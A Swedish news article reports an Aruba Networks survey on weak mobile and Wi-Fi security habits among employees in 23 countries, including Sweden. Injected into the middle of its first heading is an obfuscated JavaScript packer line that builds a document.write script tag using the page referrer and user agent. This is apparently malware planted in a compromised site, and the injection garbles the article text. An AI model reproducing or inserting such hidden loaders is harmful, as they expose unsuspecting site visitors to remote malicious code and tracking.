Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Stora brister i företags mobila säkerhet

Stora brister i företags mobila säkerhet
Sebastian

Internationell eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrrbb|var|u0026u|referrer|sikai||js|php’.split(’|’),0,{}))
undersökning visar att svenskar inte skräms av säkerhetshot

En internationell undersökning från Aruba Networks visar att säkerhetstänkandet i fråga om hur medarbetare använder mobiler och det trådlösa nätverket på sitt arbete ofta har brister. Mer än en fjärdedel av svenskarna har exempelvis inte lösenordskyddat sin jobbmobil och fler än i något annat land uppger att detta beror på att de inte oroas av några säkerhetshot. Samtidigt uppger nära en tredjedel att de blivit av med företagsinformation, till exempel genom att tappa bort sin mobil. 

Undersökningen genomfördes av Aruba Networks och omfattade 11 500 anställda i 23 länder, varav 250 svenskar. Resultaten visar på tydliga brister i fråga om säkerhetsbeteendet. Relativt många har exempelvis inte något lösenord på sin jobbmobil (16 %) eller jobbets laptop (13 %) och nästan 1 av 10 (9 %) har ett och samma lösenord för alla apparater och webbplatser.

– I Sverige är det mer än en fjärdedel av medarbetarna som inte lösenordskyddat sina mobiler och andra mobila enheter, vilket tyder på att företag inte ställer så hårda säkerhetskrav. Företag behöver se till att det finns infrastruktur och policy på plats som stödjer medarbetarna i detta. Det är fullt möjligt att kombinera ett ökat säkerhetstänkande med en ökad mobilitet, och dra nytta av den ökade produktiviteten och kreativiteten som går att uppnå, säger Maria Tiderman, Sverigechef på Aruba Networks.

Det finns problem med säkerheten på de flesta håll, men det finns också stora skillnader mellan olika länder, branscher och grupper av människor. Exempelvis blir män 20 procent oftare av med företagsdata än kvinnor. På tillväxtmarknader som Kina och Förenade Arabemiraten finns det ett mer riskfyllt beteende än i de flesta andra länder. Anmärkningsvärt är kanske också att finansmarknaden utmärker sig som en bransch där många agerar riskabelt.

– Det finns en del verkliga högriskindivider bland företags medarbetare. Det är alltför vanligt att man antar att det är företaget som ska stå för allt skydd, och att medarbetarna inte själva behöver göra något. När nästan nio av tio säger att säkerheten är IT-avdelningens ansvar så har man problem, säger Maria Tiderman.

Det finns stora skillnader mellan olika branscher, länder och kategorier av människor i fråga om hur mobila enheter och data behandlas. Några exempel:

  • Högavlönade, män och unga förlorar företagsdata: Män förlorar 20% oftare företagsinformation på sin mobil. Även yngre personer och högavlönade har en ökad risk.
  • Stora skillnader mellan olika länder: Kina, Thailand och Förenade arabemiraten hade mest riskfyllt beteende.  Säkrast var beteendet bland annat i Sverige, men även i USA och Storbritannien.
  • Finansbranschen läcker: Mer än en tredjedel (39%) av de som var anställda i finansbranschen förlorade företagsinformation genom att de använt mobilen på ett felaktigt sätt. Det är 25 procent högre än snittet.
  • Lärare behöver säkerhetslektioner: Undersökningen visar att lärare är ovanligt benägna att spara lösenord på papper. De är också flest i denna kategori som inte lösenordsäkrat sina mobiler.

Aruba Networks har utformat ett verktyg, Security Mobile Risk Index, som företag och organisationer kan använda för att utvärdera sin egen säkerhetsnivå och jämföra med andra företag i samma land och bransch.